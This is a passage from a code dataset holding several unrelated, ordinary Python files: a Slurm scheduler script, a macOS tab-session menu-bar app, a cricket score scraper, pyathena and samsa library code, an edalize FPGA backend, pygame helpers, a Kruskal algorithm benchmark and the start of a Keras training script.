formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"dependencies\", nargs=\"*\", help=\"{{dependencies}} string given by snakemake\\n\")\n parser.add_argument(\"snakescript\", help=\"Snakemake generated shell script with commands to execute snakemake rule\\n\")\n parser.add_argument(\"--config\", default=\"config_sbatch.json\", help=\"Config file to read sbatch settings from. Default='config_sbatch.json'\")\n args = parser.parse_args()\n\n #print(\"Passed bidniz:\", args.snakescript, args.dependencies, file=sys.stderr)\n #print(\"Passed args:\", args, file=sys.stderr)\n sj = SnakeJobSbatch(args.snakescript, dependencies=args.dependencies, config=json.load(open(args.config)))\n try:\n sj.schedule()\n except UndefinedJobRule as err:\n print(err.msg, file=sys.stderr)\n sys.exit(2)\n","sub_path":"scheduling/Snakefile_sbatch.py","file_name":"Snakefile_sbatch.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"591135403","text":"import rumps\nimport subprocess\n\nclass StatusBarApp(rumps.App):\n def __init__(self):\n super(StatusBarApp, self).__init__(\"BMUX\")\n\n self.icon = \"images/standard_icon.png\"\n self.temp_file = \"data/temp_tabs.txt\"\n self.tabs_file = \"data/tabs.txt\"\n self.script_file = \"scripts/tabs_script.scpt\"\n\n self.current_session = \"\"\n\n self.load_menu = []\n self.delete_menu = []\n self.load_all_sessions()\n\n self.menu = [\"Start session\",\n (\"Load session\", self.load_menu),\n (\"Delete session\", self.delete_menu)]\n\n def load_all_sessions(self):\n \"\"\"This method is for initializing the sessions from the init function.\"\"\"\n session_names = self.get_session_names()\n for name in session_names:\n load_item = rumps.MenuItem(name, callback=self.load_session)\n delete_item = rumps.MenuItem(name, callback=self.delete_session)\n self.load_menu.append(load_item)\n self.delete_menu.append(delete_item)\n\n def read_sessions(self):\n \"\"\"Reads sessions from self.tabs_file and returns a dictionary with keys as session\n names and values as a list of URLs\n \"\"\"\n sessions = {}\n session_name = \"\"\n urls = []\n with open(self.tabs_file, \"r\") as f:\n for line in f.readlines():\n if line.startswith(\"Name\") or line.isspace():\n if session_name:\n sessions[session_name] = urls\n session_name = \" \".join(line.split(\" \")[1:]).strip()\n urls = []\n else:\n urls.append(line.strip())\n return sessions\n\n def write_sessions(self, sessions):\n \"\"\"Writes the passed dictionary into tabs_file.\n \"\"\"\n with open(self.tabs_file, \"w\") as f:\n for session_name in sessions:\n urls = sessions[session_name]\n f.write(\"Name: \" + session_name + \"\\n\")\n for url in urls:\n f.write(url + \"\\n\")\n f.write(\"\\n\")\n\n @rumps.timer(10)\n def update_tabs(self, _):\n \"\"\"This function makes sure that tabs are up-to-date.\"\"\"\n if not self.current_session: return\n print(\"Current session is\", self.current_session)\n open(self.temp_file, \"w\").close()\n subprocess.check_output([\"osascript\", self.script_file])\n print(\"----Tabs found----\")\n\n url_list = []\n name = \"\"\n with open(self.temp_file, \"r\") as temp_file:\n for line in temp_file.readlines():\n value = line.strip()\n if \"missing value\" not in value:\n url_list.append(line.strip())\n\n sessions = self.read_sessions()\n sessions[self.current_session] = url_list\n self.write_sessions(sessions)\n print(\"----Tabs recorded----\")\n self.update_all_sessions()\n\n @rumps.clicked(\"Start session\")\n def record_tabs(self, _):\n \"\"\"Starts a new session, records tabs, and calls update_tabs to refresh the menu to\n reflect the new session.\n \"\"\"\n response = rumps.Window(\n cancel=\"fuggetaboutit\",\n title=\"Enter a session name\",\n dimensions=(300,20)\n )\n response.icon = \"images/standard_icon.png\"\n response = response.run()\n if not response.clicked: return\n session_name = response.text\n sessions = self.read_sessions()\n if not session_name:\n base_string = \"session_\"\n base_number = 1\n while True:\n session_name = base_string + str(base_number)\n if session_name not in sessions: break\n base_number += 1\n print(\"Creating session\", session_name)\n self.current_session = session_name\n self.update_all_sessions()\n self.update_tabs()\n\n def end_session(self, _):\n \"\"\"This method ends any current session that may be running and updates the menu\n accordingly.\n \"\"\"\n self.current_session = \"\"\n self.update_all_sessions()\n self.icon = \"images/standard_icon.png\"\n\n def get_session_names(self):\n \"\"\"This method returns all the session names stored in self.tabs_file.\"\"\"\n session_names = []\n with open(self.tabs_file, \"r\") as f:\n for line in f.readlines():\n if line.startswith(\"Name\"):\n session_names.append(\" \".join(line.split(\" \")[1:]).strip())\n return session_names\n\n def update_all_sessions(self):\n \"\"\"This method updates the menu to reflect the current state of self.tabs_file.\"\"\"\n session_names = self.get_session_names()\n load_menu = rumps.MenuItem(\"Load session\")\n delete_menu = rumps.MenuItem(\"Delete session\")\n for name in session_names:\n if name == self.current_session: continue\n load_item = rumps.MenuItem(name, callback=self.load_session)\n delete_item = rumps.MenuItem(name, callback=self.delete_session)\n load_menu.add(load_item)\n delete_menu.add(delete_item)\n self.menu.clear()\n if self.current_session:\n self.icon = \"images/green_icon.png\"\n self.menu.add(rumps.MenuItem(self.current_session))\n self.menu.add(rumps.MenuItem(\"End session\", callback=self.end_session))\n else:\n self.menu.add(rumps.MenuItem(\"Start session\", callback=self.record_tabs))\n self.menu.add(load_menu)\n self.menu.add(delete_menu)\n self.menu.add(rumps.MenuItem(\"Quit\", callback=rumps.quit_application))\n\n def load_session(self, var):\n \"\"\"Loads the session name passed in as var by loading it from self.tabs.txt, then\n updates menu to reflect this.\n \"\"\"\n session_data = self.read_sessions()\n websites = session_data[var.title]\n if websites: subprocess.check_output([\"open\", \"-n\"] + websites)\n self.current_session = var.title\n self.update_all_sessions()\n\n def delete_session(self, var):\n \"\"\"Deletes the session passed in as var and makes sure that self.current_session is\n changed to an empty string if it is the session that was deleted.\n \"\"\"\n session_data = self.read_sessions()\n new_session_data = {}\n for session in session_data:\n if session != var.title:\n new_session_data[session] = session_data[session]\n self.write_sessions(new_session_data)\n if self.current_session == var.title:\n self.current_session = \"\"\n self.update_all_sessions()\n\nif __name__ == \"__main__\":\n StatusBarApp().run()\n","sub_path":"dist/bmux.app/Contents/Resources/bmux.py","file_name":"bmux.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"604436768","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport urllib.request\nimport requests\nfrom bs4 import BeautifulSoup\n\nurl = \"http://www.cricbuzz.com/cricket-match/live-scores\"\nsourcecode = requests.get(url)\nsoup = BeautifulSoup(sourcecode.text)\nfor item in soup.select('div .cb-mtch-lst'):\n print(\"--------------------------------\")\n header = item.contents[0].findAll('a')\n print (header[0].text)\n tournament = item.contents[0].findAll('div')\n print(tournament[0].text, tournament[1].text)\n body = item.contents[1].findAll('div')\n print(body[0].text)\n print(body[1].text)\n print(\"--------------------------------\")\n","sub_path":"cricscore.py","file_name":"cricscore.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"205365020","text":"# -*- coding: utf-8 -*-\nimport unittest\nfrom datetime import datetime\n\nfrom pyathena.model import AthenaCompression, AthenaQueryExecution, AthenaRowFormat\n\nATHENA_QUERY_EXECUTION_RESPONSE = {\n \"QueryExecution\": {\n \"Query\": \"SELECT * FROM test_table\",\n \"QueryExecutionContext\": {\"Database\": \"test_database\"},\n \"QueryExecutionId\": \"12345678-90ab-cdef-1234-567890abcdef\",\n \"ResultConfiguration\": {\n \"EncryptionConfiguration\": {\n \"EncryptionOption\": \"test_encryption_option\",\n \"KmsKey\": \"test_kms_key\",\n },\n \"OutputLocation\": \"s3://bucket/path/to/\",\n },\n \"StatementType\": \"DML\",\n \"Statistics\": {\n \"DataScannedInBytes\": 1234567890,\n \"EngineExecutionTimeInMillis\": 234567890,\n \"QueryQueueTimeInMillis\": 34567890,\n \"TotalExecutionTimeInMillis\": 4567890,\n \"QueryPlanningTimeInMillis\": 567890,\n \"ServiceProcessingTimeInMillis\": 67890,\n \"DataManifestLocation\": \"s3://bucket/path/to/\",\n },\n \"Status\": {\n \"CompletionDateTime\": datetime(2019, 1, 1, 0, 0, 0),\n \"State\": \"SUCCEEDED\",\n \"StateChangeReason\": \"test_reason\",\n \"SubmissionDateTime\": datetime(2019, 1, 1, 0, 0, 0),\n },\n \"WorkGroup\": \"test_work_group\",\n }\n}\n\n\nclass TestAthenaQueryExecution(unittest.TestCase):\n def test_init(self):\n actual = AthenaQueryExecution(ATHENA_QUERY_EXECUTION_RESPONSE)\n self.assertEqual(actual.database, \"test_database\")\n self.assertEqual(actual.query_id, \"12345678-90ab-cdef-1234-567890abcdef\")\n self.assertEqual(actual.query, \"SELECT * FROM test_table\")\n self.assertEqual(actual.statement_type, \"DML\")\n self.assertEqual(actual.state, \"SUCCEEDED\")\n self.assertEqual(actual.state_change_reason, \"test_reason\")\n self.assertEqual(actual.completion_date_time, datetime(2019, 1, 1, 0, 0, 0))\n self.assertEqual(actual.submission_date_time, datetime(2019, 1, 1, 0, 0, 0))\n self.assertEqual(actual.data_scanned_in_bytes, 1234567890)\n self.assertEqual(actual.engine_execution_time_in_millis, 234567890)\n self.assertEqual(actual.query_queue_time_in_millis, 34567890)\n self.assertEqual(actual.total_execution_time_in_millis, 4567890)\n self.assertEqual(actual.query_planning_time_in_millis, 567890)\n self.assertEqual(actual.service_processing_time_in_millis, 67890)\n self.assertEqual(actual.output_location, \"s3://bucket/path/to/\")\n self.assertEqual(actual.data_manifest_location, \"s3://bucket/path/to/\")\n self.assertEqual(actual.encryption_option, \"test_encryption_option\")\n self.assertEqual(actual.kms_key, \"test_kms_key\")\n self.assertEqual(actual.work_group, \"test_work_group\")\n\n\nclass TestAthenaRowFormat(unittest.TestCase):\n def test_is_valid(self):\n self.assertTrue(AthenaRowFormat.is_valid(\"parquet\"))\n self.assertFalse(AthenaRowFormat.is_valid(None))\n self.assertFalse(AthenaRowFormat.is_valid(\"\"))\n self.assertFalse(AthenaRowFormat.is_valid(\"foobar\"))\n\n\nclass TestAthenaCompression(unittest.TestCase):\n def test_is_valid(self):\n self.assertTrue(AthenaCompression.is_valid(\"snappy\"))\n self.assertFalse(AthenaCompression.is_valid(None))\n self.assertFalse(AthenaCompression.is_valid(\"\"))\n self.assertFalse(AthenaCompression.is_valid(\"foobar\"))\n","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"160699417","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n\n# %%\nimport heapq\nimport pandas as pd\nimport time\n\nSAVE_GRAPHS_FOLDER = \"rozlozeni_dat\\\\\"\n\n# %% [markdown]\n# ## FUNCTIONS\n\n# %%\n# nalezeni vrcholu v grafu\ndef find_vertices_in_tree(tree):\n vertices = set()\n for edge in tree:\n vertices.add(edge[1])\n vertices.add(edge[2])\n return vertices\n\n# spocitani celkove vahy minimalnistry grafu pro ucely testovani\ndef count_minimum_spanning_tree_weight(tree):\n count = 0\n for edge in tree:\n count += int(edge[0])\n return count\n\n# nacteni datasetu z @filepath\ndef load_dataset(filepath):\n vertices = set()\n graph = {\n 'edges':set([]),\n 'vertices':set([]),\n }\n try:\n f = open(filepath, \"r\")\n for x in f:\n x = x.replace(' ', '')\n split_line = x.split(',')\n split_line[2] = split_line[2].replace('\\n', '')\n graph['edges'].add((int(split_line[2]),split_line[1],split_line[0]))\n graph['vertices'].add(split_line[0])\n graph['vertices'].add(split_line[1])\n f.close()\n return graph\n except:\n return -1\n\n\n# prihradkove razeni nad @graph\ndef bucket_sort(graph):\n edges = graph['edges']\n max_value = max(edges)[0]\n bucket_size = max_value / len(edges)\n\n buckets = []\n for _ in edges:\n buckets.append([])\n\n for edge in edges:\n if int(edge[0] / bucket_size) == len(buckets):\n buckets[int(edge[0] / bucket_size)-1].append(edge)\n else:\n buckets[int(edge[0] / bucket_size)].append(edge)\n for bucket in buckets:\n sorted(bucket)\n return(buckets)\n\n# nalezeni neprazdne prihradky od indexu @index\ndef find_non_empty_bucket(buckets, index):\n for i in range(index, len(buckets)):\n if len(buckets[i]) != 0:\n return i, buckets[i]\n return -1\n\n# %%\n# funkce pro vypis casu spusteni dvou metod pomoci magic module %timeit\ndef time_execution(DATASET):\n\n\n # pro asserty\n time1 = []\n time2 = []\n\n for _ in range(0, 4):\n start_time1 = time.process_time_ns()\n tree1 = alternative_kruskal(load_dataset(DATASET))\n time1.append(time.process_time_ns() - start_time1)\n start_time2 = time.process_time_ns()\n tree2 = og_kruskal(load_dataset(DATASET))\n time2.append(time.process_time_ns() - start_time2)\n \n\n\n print(\"Asserting minimum spanning trees...\")\n assert(len(tree1) == len(tree2))\n assert(count_minimum_spanning_tree_weight(tree1) == count_minimum_spanning_tree_weight(tree2))\n assert(find_vertices_in_tree(tree1) == find_vertices_in_tree(tree2))\n print(\"Assert passed. Executing...\\n\")\n\n print(\"Time of execution of my kruskal implementation on the dataset '{}'\".format(DATASET))\n print(str((sum(time1) / len(time1)) / 1000000000.0)+\" s\")\n\n print(\"-----------------------------------------------------------------------\")\n\n print(\"Timing of the original kruskal implementation on the dataset {}\".format(DATASET))\n print(str((sum(time2) / len(time2)) / 1000000000.0)+\" s\")\n print(\"\\n\")\n\n# %%\nparent = dict()\nrank = dict()\n\n# funkce pro vytvoreni setu\ndef make_set(vertice):\n parent[vertice] = vertice\n rank[vertice] = 0\n\n# funkce find pro union & find\ndef find(vertice):\n if parent[vertice] != vertice:\n parent[vertice] = find(parent[vertice])\n return parent[vertice]\n\n# funkce union pro union & find\ndef union(vertice1, vertice2):\n root1 = find(vertice1)\n root2 = find(vertice2)\n if root1 != root2:\n if rank[root1] > rank[root2]:\n parent[root2] = root1\n else:\n parent[root1] = root2\n if rank[root1] == rank[root2]: rank[root2] += 1\n\n# ma alternativni implementace kruskalova algoritmu\ndef alternative_kruskal(graph):\n\n # vytvareni setu pro kazdy vrchol\n for vertice in graph['vertices']:\n make_set(vertice)\n\n minimum_spanning_tree = set()\n # index intervalu prihradky \n j = 0\n\n # min halda\n h = []\n\n # vytvoreni prihradek\n buckets = bucket_sort(graph)\n while len(minimum_spanning_tree) < len(graph['vertices']) - 1:\n if(len(h) == 0):\n index_and_bucket = find_non_empty_bucket(buckets, j)\n empty_bucket = index_and_bucket[1]\n j = index_and_bucket[0]\n # pridani obsahu prihradky na haldu\n for val in empty_bucket:\n heapq.heappush(h, val)\n # nalezeni a vymazani hrany s danym ohodnocenim\n #edge = find_and_remove_edge(graph, min(h))\n\n #edge = min(h)\n # vymazani hrany z haldy\n edge = heapq.heappop(h)\n\n # vynulovani prazdne prihradky\n if len(h) == 0:\n buckets[j] = []\n \n weight, vertice1, vertice2 = edge\n if find(vertice1) != find(vertice2):\n minimum_spanning_tree.add(edge)\n union(vertice1, vertice2)\n\n return minimum_spanning_tree\n\n# originalni implementace s vyuzitim union & find od israelst (https://github.com/israelst/Algorithms-Book--Python/blob/master/5-Greedy-algorithms/kruskal.py)\ndef og_kruskal(graph):\n for vertice in graph['vertices']:\n make_set(vertice)\n\n minimum_spanning_tree = set()\n edges = list(graph['edges'])\n edges.sort()\n for edge in edges: \n \n weight, vertice1, vertice2 = edge\n if find(vertice1) != find(vertice2):\n union(vertice1, vertice2)\n minimum_spanning_tree.add(edge)\n\n return minimum_spanning_tree\n\n# %% [markdown]\n# ## Time execution experiments\n# %% [markdown]\n# ### DATASET 1\n\n# %%\nDATASET = 'data/1.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['7'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n# %% [markdown]\n# ### DATASET 2\n\n# %%\nDATASET = 'data/2.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['46'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n# %% [markdown]\n# ### DATASET 3\n\n# %%\nDATASET = 'data/3.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['809'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n# %% [markdown]\n# ### DATASET 4\n\n# %%\nDATASET = 'data/4.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['7625'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n\n# %% [markdown]\n### DATASET 5\n\n\n# %%\nDATASET = 'data/5.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['170'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n\n# %%\nDATASET = 'data/6.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['739'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n\n# %%\nDATASET = 'data/7.csv' \nprint(\"Saved weight distribution graph of the dataset '{}' to {}\".format(DATASET.split('/')[1], SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf'))\npd.read_csv(DATASET)['212'].hist().get_figure().savefig(SAVE_GRAPHS_FOLDER+DATASET.split('/')[1]+'.pdf')\n\n\n# %%\ntime_execution(DATASET)\n\n\n\n","sub_path":"kruskal.py","file_name":"kruskal.py","file_ext":"py","file_size_in_byte":7948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"141574042","text":"__license__ = \"\"\"\nCopyright 2012 DISQUS\nCopyright 2013 Parse.ly, Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport logging\n\nfrom samsa.exceptions import NoAvailablePartitionsError\nfrom samsa.partitioners import random_partitioner\nfrom samsa.partitions import PartitionMap\nfrom samsa.consumer import Consumer\nfrom samsa.utils import attribute_repr\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass TopicMap(object):\n \"\"\"\n Provides a dictionary-like interface to :class:`~samsa.topics.Topic`\n instances within a cluster.\n\n :param cluster: The cluster this topic mapping is associated with.\n :type cluster: :class:`samsa.cluster.Cluster`\n \"\"\"\n def __init__(self, cluster):\n self.cluster = cluster\n\n self.__topics = {}\n\n def __getitem__(self, key):\n \"\"\"\n Returns a :class:`samsa.topics.Topic` for the given key.\n\n This is a proxy to :meth:`~TopicMap.get` for a more dict-like\n interface.\n \"\"\"\n return self.get(key)\n\n def get(self, name):\n \"\"\"\n Returns a :class:`samsa.topics.Topic` for this topic name, creating a\n new topic if one has not already been registered.\n \"\"\"\n topic = self.__topics.get(name, None)\n if topic is None:\n topic = self.__topics[name] = Topic(self.cluster, name)\n logger.info('Registered new topic: %s', topic)\n return topic\n\n\nclass Topic(object):\n \"\"\"\n A topic within a Kafka cluster.\n\n :param cluster: The cluster that this topic is associated with.\n :type cluster: :class:`samsa.cluster.Cluster`\n :param name: The name of this topic.\n :param partitioner: callable that takes two arguments, ``partitions`` and\n ``key`` and returns a single :class:`~samsa.partitions.Partition`\n instance to publish the message to.\n :type partitioner: any callable type\n \"\"\"\n def __init__(self, cluster, name, partitioner=random_partitioner):\n self.cluster = cluster\n self.name = name\n self.partitions = PartitionMap(self.cluster, self)\n self.partitioner = partitioner\n\n __repr__ = attribute_repr('name')\n\n def latest_offsets(self):\n return [(p.broker.id, p.latest_offset())\n for p\n in self.partitions]\n\n def publish(self, data, key=None):\n \"\"\"\n Publishes one or more messages to a random partition of this topic.\n\n :param data: message(s) to be sent to the broker.\n :type data: ``str`` or sequence of ``str``.\n :param key: a key to be used for semantic partitioning\n :type key: implementation-specific\n \"\"\"\n if len(self.partitions) < 1:\n raise NoAvailablePartitionsError('No partitions are available to '\n 'accept a write for this message. (Is your Kafka broker '\n 'running?)')\n partition = self.partitioner(self.partitions, key)\n return partition.publish(data)\n\n def subscribe(self,\n group,\n backoff_increment=1,\n connect_retries=4,\n fetch_size=307200,\n offset_reset='nearest',\n rebalance_retries=4,\n ):\n \"\"\"\n Returns a new consumer that can be used for reading from this topic.\n\n `backoff_increment` is used to progressively back off asking a partition\n for messages when there aren't any ready. Incrementally increases wait\n time in seconds.\n\n `offset_reset` is used to determine where to reset a partition's offset\n in the event of an OffsetOutOfRangeError. Valid values are:\n\n \"earliest\": Go to the earliest message in the partition\n \"latest\": Go to the latest message in the partition\n \"nearest\": If requested offset is before the earliest, go there,\n otherwise, go to the latest message in the partition.\n\n `rebalance_retries` and `connect_retries` affect the number of times\n to try acquiring partitions before giving up.\n\n When samsa restarts, there can be a bit of lag before\n Zookeeper realizes the old client is dead and releases the partitions\n it was consuming. Setting this means samsa will wait a bit and try to\n acquire partitions again before throwing an error. In the case of\n rebalancing, sometimes it takes a bit for a consumer to release the\n partition they're reading, and this helps account for that.\n\n :param group: The consumer group to join.\n :param backoff_increment: How fast to incrementally backoff when a\n partition has no messages to read.\n :param connect_retries: Retries before giving up on connecting\n :param fetch_size: Default fetch size (in bytes) to get from Kafka\n :param offset_reset: Where to reset when an OffsetOutOfRange happens\n :param rebalance_retries: Retries before giving up on rebalance\n :rtype: :class:`samsa.consumer.consumer.Consumer`\n \"\"\"\n return Consumer(self.cluster,\n self,\n group,\n backoff_increment=backoff_increment,\n connect_retries=connect_retries,\n fetch_size=fetch_size,\n offset_reset=offset_reset,\n rebalance_retries=rebalance_retries)\n","sub_path":"samsa/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"497245113","text":"# Copyright edalize contributors\n# Licensed under the 2-Clause BSD License, see LICENSE for details.\n# SPDX-License-Identifier: BSD-2-Clause\n\nimport os.path\n\nfrom edalize.edatool import Edatool\nfrom edalize.yosys import Yosys\nfrom importlib import import_module\n\nclass Icestorm(Edatool):\n\n argtypes = ['vlogdefine', 'vlogparam']\n\n @classmethod\n def get_doc(cls, api_ver):\n if api_ver == 0:\n yosys_help = Yosys.get_doc(api_ver)\n icestorm_help = {\n 'members' : [\n {'name' : 'pnr',\n 'type' : 'String',\n 'desc' : 'Select Place & Route tool. Legal values are *arachne* for Arachne-PNR, *next* for nextpnr or *none* to only perform synthesis. Default is next'}],\n 'lists' : [\n {'name' : 'arachne_pnr_options',\n 'type' : 'String',\n 'desc' : 'Additional options for Arachnhe PNR'},\n {'name' : 'nextpnr_options',\n 'type' : 'String',\n 'desc' : 'Additional options for nextpnr'},\n {'name' : 'yosys_synth_options',\n 'type' : 'String',\n 'desc' : 'Additional options for the synth_ice40 command'},\n ]}\n\n combined_members = icestorm_help['members']\n combined_lists = icestorm_help['lists']\n yosys_members = yosys_help['members']\n yosys_lists = yosys_help['lists']\n\n combined_members.extend(m for m in yosys_members if m['name'] not in [i['name'] for i in combined_members])\n combined_lists.extend(l for l in yosys_lists if l['name'] not in [i['name'] for i in combined_lists])\n\n return {'description' : \"Open source toolchain for Lattice iCE40 FPGAs. Uses yosys for synthesis and arachne-pnr or nextpnr for Place & Route\",\n 'members' : combined_members,\n 'lists' : combined_lists}\n\n def configure_main(self):\n # Write yosys script file\n (src_files, incdirs) = self._get_fileset_files()\n yosys_synth_options = self.tool_options.get('yosys_synth_options', '')\n yosys_edam = {\n 'files' : self.files,\n 'name' : self.name,\n 'toplevel' : self.toplevel,\n 'parameters' : self.parameters,\n 'tool_options' : {'yosys' : {\n 'arch' : 'ice40',\n 'yosys_synth_options' : yosys_synth_options,\n 'yosys_as_subtool' : True,\n }\n }\n }\n\n yosys = getattr(import_module(\"edalize.yosys\"), 'Yosys')(yosys_edam, self.work_root)\n yosys.configure()\n\n pcf_files = []\n for f in src_files:\n if f.file_type == 'PCF':\n pcf_files.append(f.name)\n elif f.file_type == 'user':\n pass\n\n if not pcf_files:\n pcf_files = ['empty.pcf']\n with open(os.path.join(self.work_root, pcf_files[0]), 'a'):\n os.utime(os.path.join(self.work_root, pcf_files[0]), None)\n elif len(pcf_files) > 1:\n raise RuntimeError(\"Icestorm backend supports only one PCF file. Found {}\".format(', '.join(pcf_files)))\n\n pnr = self.tool_options.get('pnr', 'next')\n part = self.tool_options.get('part', None)\n if not pnr in ['arachne', 'next', 'none']:\n raise RuntimeError(\"Invalid pnr option '{}'. Valid values are 'arachne' for Arachne-pnr, 'next' for nextpnr or 'none' to only perform synthesis\".format(pnr))\n # Write Makefile\n arachne_pnr_options = self.tool_options.get('arachne_pnr_options', [])\n nextpnr_options = self.tool_options.get('nextpnr_options', [])\n template_vars = {\n 'name' : self.name,\n 'pcf_file' : pcf_files[0],\n 'pnr' : pnr,\n 'arachne_pnr_options' : arachne_pnr_options,\n 'nextpnr_options' : nextpnr_options,\n 'default_target' : 'json' if pnr == 'none' else 'bin',\n 'device' : part,\n }\n self.render_template('icestorm-makefile.j2',\n 'Makefile',\n template_vars)\n","sub_path":"edalize/icestorm.py","file_name":"icestorm.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"351213854","text":"\r\nimport pygame, sys\r\nimport os.path\r\n\r\nFPS = 30 # frames per second setting\r\nCLOCKSPEED = 628 #default clockspeed\r\nimageCache = {}\r\n\r\ndef loadImage(path): \r\n\r\n if(path != None and os.path.exists(path)):\r\n try:\r\n return pygame.image.load(path)\r\n except Exception:\r\n print(\"Could not load image \" + str(path) + \" \" + str(Exception))\r\n return pygame.Surface((1,1),pygame.SRCALPHA)\r\n \r\n else:\r\n print(\"File not found \" + str(path))\r\n\r\n return pygame.Surface((1,1),pygame.SRCALPHA)\r\n\r\n\r\n\r\ndef loadCachedImage(path):\r\n if(path in imageCache):\r\n return imageCache[path]\r\n else:\r\n image = loadImage(path)\r\n imageCache[path] = image\r\n return image\r\n\r\ndef aspect_scale(img, bx,by ): \r\n ix,iy = img.get_size()\r\n if ix > iy:\r\n # fit to width\r\n scale_factor = bx/float(ix)\r\n sy = scale_factor * iy\r\n if sy > by:\r\n scale_factor = by/float(iy)\r\n sx = scale_factor * ix\r\n sy = by\r\n else:\r\n sx = bx\r\n else:\r\n # fit to height\r\n scale_factor = by/float(iy)\r\n sx = scale_factor * ix\r\n if sx > bx:\r\n scale_factor = bx/float(ix)\r\n sx = bx\r\n sy = scale_factor * iy\r\n else:\r\n sy = by\r\n\r\n return pygame.transform.scale(img, (int(sx),int(sy)) )\r\n\r\n\r\ndef blitMultilineText(surface, text, pos, font, color=pygame.Color('black')):\r\n words = [word.split(' ') for word in text.splitlines()] # 2D array where each row is a list of words.\r\n space = font.size(' ')[0] # The width of a space.\r\n max_width, max_height = surface.get_size()\r\n x, y = pos\r\n for line in words:\r\n for word in line:\r\n word_surface = font.render(word, 0, color)\r\n word_width, word_height = word_surface.get_size()\r\n if x + word_width >= max_width:\r\n x = pos[0] # Reset the x.\r\n y += word_height # Start on new row.\r\n surface.blit(word_surface, (x, y))\r\n x += word_width + space\r\n x = pos[0] # Reset the x.\r\n y += word_height # Start on new row.\r\n\r\ndef quick_sort(items):\r\n \"\"\" Implementation of quick sort \"\"\"\r\n if len(items) > 1:\r\n pivot_index = int(len(items) / 2)\r\n smaller_items = []\r\n larger_items = []\r\n \r\n for i, val in enumerate(items):\r\n if i != pivot_index:\r\n if val < items[pivot_index]:\r\n smaller_items.append(val)\r\n else:\r\n larger_items.append(val)\r\n \r\n quick_sort(smaller_items)\r\n quick_sort(larger_items)\r\n items[:] = smaller_items + [items[pivot_index]] + larger_items\r\n","sub_path":"Common.py","file_name":"Common.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"119646798","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom keras_preprocessing.image import ImageDataGenerator\nimport tensorflow as tf\n\nkeras = tf.keras\n\ngpus = tf.config.experimental.list_physical_devices('GPU')\nfor gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\nprint(\"Num GPUs available: \", len(gpus))\n\ndef main():\n TRAINING_DIR = '../images/balls-for-study'\n training_datagen = ImageDataGenerator(\n rescale=1. / 255,\n rotation_range=60,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n validation_split=0.2,\n fill_mode='nearest')\n\n # 